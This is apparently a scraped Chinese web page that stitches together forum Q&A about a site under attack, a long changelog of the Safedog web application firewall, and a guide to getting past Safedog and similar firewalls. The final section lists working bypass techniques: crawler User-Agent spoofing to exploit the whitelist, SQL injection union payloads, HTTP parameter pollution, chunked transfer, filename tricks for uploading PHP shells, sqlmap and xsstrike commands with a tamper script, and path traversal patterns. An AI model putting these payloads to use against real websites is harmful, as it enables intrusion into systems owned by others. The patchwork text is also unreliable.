xss安全狗绕过（xss攻击绕过）

网站一直被攻击，求助，cpu一直跑满

cpu100%应该是cc攻击把？

cc攻击的话，建议用安全狗结合cdn进行防御，单独的软件防护能力是有限的，cdn有分流作用。可以对cc起到一定程度的缓冲。安全狗软件可以防御一定量的cc，且还可以防注入、xss等针对网站的攻击，结合起来效果会更好点哦

怎么绕过安全狗提权，绕过安全狗用户限制提权

一般有vbs提权cmd提权net什么的

这些东西可以去乌龙院技术站

我网站，被人上传了文件，我没开FTP，服务器有安全狗，就是不知道他怎么入侵上传的，还打包我的网站源

网站源码有漏洞导致，需打好安全补丁，检查程序系统漏洞，做好安全防护

网站安全狗的更新历史

安全狗linux版集成Apache和nginx防护模块

1、 *** 防火墙全新改版，功能模块更清晰更合理，让用户可以更灵活地设置DDOS攻击防护、CC攻击防护、Ftp/SSH防暴力破解等功能。

2、 *** 防火墙全面支持超级黑白名单，多层防护更彻底。独立IP黑名单和IP白名单，支持开启或关闭，作用于整个 *** 防火墙模块。

3、独立暴力破解防御模块，包括Ftp防暴力破解和SSH防暴力破解

4、支持设置SSH远程登录端口

5、扩展邮件告警，支持服云告警的新方式

网站安全狗V3.1（2013-09-23）

1、新增数据包拦截功能，防止网站被挂马后对外发包，提高网站安全性

2、新增IP临时黑名单功能，实现自动化的IP黑名单添加

3、新改进：升级中心优化，提升整体稳定性

4、优化IP白名单功能，实现针对功能点的白名单

2013年6月更新日志

网站安全狗V3.0.04800（2013-06-09）

1、新改进：完善爬虫白名单，解决爬虫误拦问题

2、新改进：界面优化，增强界面稳定性

3、新改进：升级中心优化，提升整体稳定性

2013年5月更新日志

网站安全狗V3.0.04550（更新日期2013-05-28）

(1)新改进:“禁止Get、Post之外的请求”防护功能优化

(2)新改进:增加PHPCGI默认白名单，避免发生误拦截问题

(3)新改进:日志界面优化，日志信息的提示信息支持换行显示

(4)新功能:拦截攻击返回页面标题更改为“网站防火墙”

(5)新功能:网马库更新，显著增强黑链识别能力与准确率

网站安全狗V3.0正式版（更新日期2013-05-13）

(1)新改进:界面全新优化，增强用户体验

(2)新改进:优化日志格式，防护结果一目了然

(3)新改进:网马防护、文件防篡改、多线程防下载等功能全面支持2008,2012等系统

(4)新功能:增加IIS危险组件主动防护功能

(5)新功能:增加禁止IIS执行程序功能

(6)新功能:增加.NET安全设置及敏感函数保护功能

(7)新功能:增加了隐藏WEB容器版本信息功能

2012年11月更新日志

网站安全狗ApacheV2.0 正式版(更新日期2012-11-12)

(1)新增网马、挂马主动防御，禁止特定文件上传，IIS目录漏洞、短文件名漏洞防护功能

(2)新增网页防篡改功能(结合安全狗云安全中心使用)

(3)CC防护引入会话机制，防止误拦截

(4)网马扫描新增自定义扫描

(5)SQL注入新增白名单、XSS防护规则

(6)域名选择对话框新增查找功能

(7)防盗链信任域名增加对*.顶级域名 的支持

(8)优化Apache防护的资源利用率

网站安全狗V2.4.01556 正式版（更新日期2012-11-12）

(1)解决部分用户反馈的插件崩溃问题

(2)增加一批新的特征库，解决网上流传的绕过安全狗的机制

2012年10月更新日志

网站安全狗V2.4.01199 正式版（更新日期2012-10-24）

(1)WIN2008服务器下载大文件时CPU过高问题修复

(2)上传图片图片变形问题修复

(3)SQL注入防御白名单，网马主动防御白名单增加对目录的支持，防下载功能增加对文件的支持

(4)优化短文件名漏洞防护算法，防止误判

(5)增强插件网马防护功能，对;目录的网马主动防御

(6)解决安装在中文路径下，部分功能失效的问题

2012年09月更新日志

网站安全狗V2.4 正式版（更新日期2012-09-26）

(1)新增对IP:端口、域名：端口站点形式的支持

(2)新增网马、挂马主动防御，禁止特定文件上传，IIS目录漏洞、短文件名漏洞防护功能

(3)新增网页防篡改功能（结合安全狗云安全中心使用）

(4)CC防护引入会话机制，防止误拦截

(5)优化IIS分号漏洞防护算法与SQL注入防护算法，防止被绕过

(6)网马扫描新增自定义扫描

(7)SQL注入新增白名单、XSS防护规则

(8)域名选择对话框新增查找功能

(9)防盗链信任域名增加对*.顶级域名 的支持

(10)加强防盗链Session防护功能

(11)对日志界面与CPU监控界面内存管理进行优化，占用更少内存

(12)优化插件架构,提高运行效率

(13)美化界面

2012年04月更新日志

网站安全狗V2.3 正式版（更新日期2012-04-12）

（1）新增网站实时CPU监控功能；

（2）新增网站实时流量监控功能；

（3）防护日志摒弃开启Everyone权限,消除安全隐患；

（4）IP黑名单增加描述字段；

（5）CC攻击识别首页形式

（6）对界面内存管理进行优化，占用更少内存。

2012年02月更新日志

网站安全狗V2.2.1 正式版（更新日期2012-02-03）

（1）增加安全狗界面的密码设置保护功能，保护参数不被随意修改；

（2）新增多个SQL注入防护规则，保护服务器不被非法探测；

（3）增加网页黑链的检测，帮助用户及时发现并清除黑链；

（4）增加网马挂马域名白名单的快捷按钮；

（5）优化CC攻击防护的 *** 识别标志，能够主动识别更多的 *** 访问，增强 *** 类型的CC防护效果；

（6）优化默认的CC防护参数，降低误判的概率；

（7）优化日志目录权限的设置；

（8）优化日志功能，避免出现重复日志。

网站安全狗ApacheV1.0正式版（更新日期2012-02-03）

（1）修改Apache默认目录设置的问题，能够识别多种情况的默认目录；

（2）增加安全狗界面的密码设置保护功能，保护参数不被随意修改；

（3）新增多个SQL注入防护规则，保护服务器不被非法探测；

（4）增加网页黑链的检测，帮助用户及时发现并清除黑链；

（5）增加网马挂马域名白名单的快捷按钮；

（6）优化CC攻击防护的 *** 识别标志，能够主动识别更多的 *** 访问，增强 *** 类型的CC防护效果；

（7）优化默认的CC防护参数，降低误判的概率；

（8）优化日志功能，避免出现重复日志。

2011年12月更新日志

网站安全狗Apache版V1.0 Beta（更新日期2011-12-08）

（1）支持Apache2.0及Apache2.2版本的网站安全防护；

（2）增加支持Apache网站的网马扫描及隔离功能；

（3）增加支持Apache网站的SQL注入防御功能；

（4）增加支持Apache网站的防盗链及重要资源防下载功能；

（5）增加支持Apache网站的CC攻击防护

2011年11月更新日志

网站安全狗V2.2 正式版（更新日期2011-11-08）

（1）优化网马扫描模块，减少网页挂马误报情况。

（2）增加域名白名单，支持用户自定义白名单，进一步降低误报情况。

（3）增加用户手动上报网马功能，以进一步丰富网马样本库。

（4）增强防盗链功能，支持流媒体的防盗链模式。

（5）修复日志查询出现界面卡住的问题。

2011年10月更新日志

网站安全狗V2.2 Beta版本（更新日期2011-10-10）

（1）界面重新优化，引入全新的界面技术，支持换肤。

（2）在切换界面时，智能识别是否修改过配置并提醒，再也不会不小心忘记保存了。

网马部分：

（3）采用全新网马检测引擎，大幅提高了查杀率，降低了误报率。

（4）新增可疑网马检测功能。

（5）采用了优化的算法，大幅提高了网马检测速度，并对网马进行了详细的分类。

（6）网马库自动升级，使最新网马无处可逃。

插件部分：

（7）插件代码进行重构、优化，效率更高。

（8）允许手动在线更新SQL注入防护规则。

（9）增强非法URL识别功能。

（10）对其它信任域名设置进行规范处理，防止用户误输入导致失败。

（11）修复了无法对mp3资源的防盗链防护的问题。

（12）增强CC攻击防护功能，允许通过设置不返回提示信息来降低输出流量。并且修复了困扰已久的频繁出现“你的请求过多”的页面的BUG。

（13）增加了IP白名单设置，使防护更人性化与灵活。（注：白名单优先级高于黑名单）

（14）增加了对搜索引擎的爬虫过滤功能，您可以通过Http协议的UserAgent字段来添加新的搜索引擎爬虫支持。

（15）旧版本配置可以通过备份应用到新版本中。

（16）程序进行了微软签名认证，加强程序的安全性。

2011年5月更新日志

网站安全狗V2.0.5版本（更新日期2011-05-27）

(1)进程名称进行统一，采用Safedog做为前缀，方便用户辨别；

(2)改进网页挂马扫描误报率较高的问题；

(3)解决Win2003 X64,Win2008 X32/X64系统下的兼容问题；

(4)对网站安全狗默认的返回提示进行修改，区分不同类型防护的提示；

(5)CC攻击防护中增加Session保护机制，以及增加后缀名的判断；

(6)解决日志查看中日志太长引起界面崩溃的问题

(7)经过服务器专家测评，云安服务器卫士已通过公安部信息安全产品检测中心的检测，并获检验合格证书。

怎么绕过安全狗？

安全狗，知名互联网安全品牌，领先的云安全与解决方案提供商。

可能之前很多人想到的是之前那个传了很久的溢出，其实没溢出那么厉害，不过影响也不小，一个逻辑漏洞，如果是你做网站，装了Waf，肯定是会把搜索引擎的爬虫放到白名单里面，不然SEO就麻烦了。

白名单意味着什么？就是说在白名单里面的用户，WAF都会不管它，直接放行，所以就可以利用这个东西来绕过安全狗。搜索引擎爬虫是在安全狗的白名单，我们只需要伪装成爬虫就OK了。

安全狗是怎么判断爬虫的呢？发现很普通的 *** ，就是user-agent（意思是用户 *** 。用户 *** 是一种对数据打包、创造分组头，以及编址、传递消息的部件。用户 *** 是指浏览器,它的信息包括硬件平台、系统软件、应用软件和用户个人偏好.用户 *** ，它还包括搜索引擎。）大家都知道这个东西很好伪造。

伪造的话就比如：（举例）HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent（ user-agent字符串过长会影响访问网站,可以修改注册表）

对比正常电脑的修改,或者直接导入注册表.这样就方便了很多。

2-WAF主要过滤方式及绕过(HPP污染&分块传输&垃圾数据)

1、速度流量问题

2、工具的指纹被识别

3、工具的检测Poc或Payload

1、SQL注入文件上传绕过

2、XSS跨站其他漏洞绕过

3、HPP污染垃圾数据分块等

SQL注入

关键字替换

like 1

like 12

更换提交方式：

POST id=-1 union select 1,2,3--+

模拟文件上传 传递数据

分块传输：更改数据请求格式

HPP参数污染：id=1/* id=-1%20union%20select%201,2,3%23 /

文件上传：换行解析垃圾溢出%00干扰=符号干扰参数模拟

filename=a.php

filename="a.php

filename="a.php%00"

垃圾数据;filename="a.php"

无限filename;filename="a.php"

filename=="a.php"

filename="name='uploadfile.php"

filename="Content-Disposition: form-data.php"

filename=="a.ph

p"

python sqlmap.py -u " *submit=%E6%9F%A5%E8%AF%A2 " --random-agent --tamper= rdog.py --proxy=" "

格式替换

python xsstrike.py -u " ;submit=submit " --proxy

txt= y);submit=%E6%8F%90%E4%BA%A4

文件包含：没什么好说的就这几种

..\ ..../ ...\等

安全狗：

注入 xss 文件上传拦截

rce 文件包含 等其他不拦截

宝塔：

注入 上传拦截

rce 文件包含 xss等其他不拦截

其中拦截的是关键字

aliyun

拦截的CC速度 和 后门 信息收集和权限维持阶段拦截

漏洞利用 他不拦截 默认的版本（升级版本没测试）

WAF PHP环境 JAVA不支持